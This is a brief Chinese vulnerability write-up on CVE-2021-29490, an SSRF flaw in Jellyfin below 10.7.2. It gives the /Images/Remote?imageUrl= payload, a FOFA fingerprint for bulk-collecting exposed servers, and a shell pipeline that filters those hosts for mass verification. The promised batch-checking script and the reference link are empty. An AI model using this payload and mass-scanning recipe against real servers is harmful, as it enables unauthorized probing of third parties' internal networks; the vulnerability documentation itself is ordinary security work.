CVE-2021-29490-Jellyfin-SSRF
目录
1. 漏洞简介
Jellyfin是一个自由软件媒体系统,可让您控制媒体的管理和流媒体。它是专有的Emby和Plex的替代品,可通过多个应用程序从专用服务器向终端用户设备提供媒体。Jellyfin是Emby 3.5.2版本的后代,移植到.NET Core框架以支持完整的跨平台支持。没有任何附加条件,只是一个团队想要更好地构建更好的东西并共同努力实现它,致力于让所有用户都能访问最好的媒体系统
Jellyfin RemoteImageController.cs 文件中存在 SSRF 漏洞,通过构造特殊的请求,探测内网信息
2. 影响版本
Jellyfin < 10.7.2
3. 漏洞复现
/Images/Remote?imageUrl=http://www.baidu.com
fofa搜索引擎的指纹为:“Jellyfin” && port=“8096” ,用 Fofa采集工具.exe 批量收集资产
搜集到的资产结果会保存到同目录的一个result.csv文件中
用shell命令筛选IP或者域名
cat result.csv | awk -F "," '{print $2}' | httpx >> Jellyfin.txt
再用python脚本批量验证
|
|
4. 漏洞修复
更新版本
5. 参考链接
关于SSRF漏洞,可以看这个博文: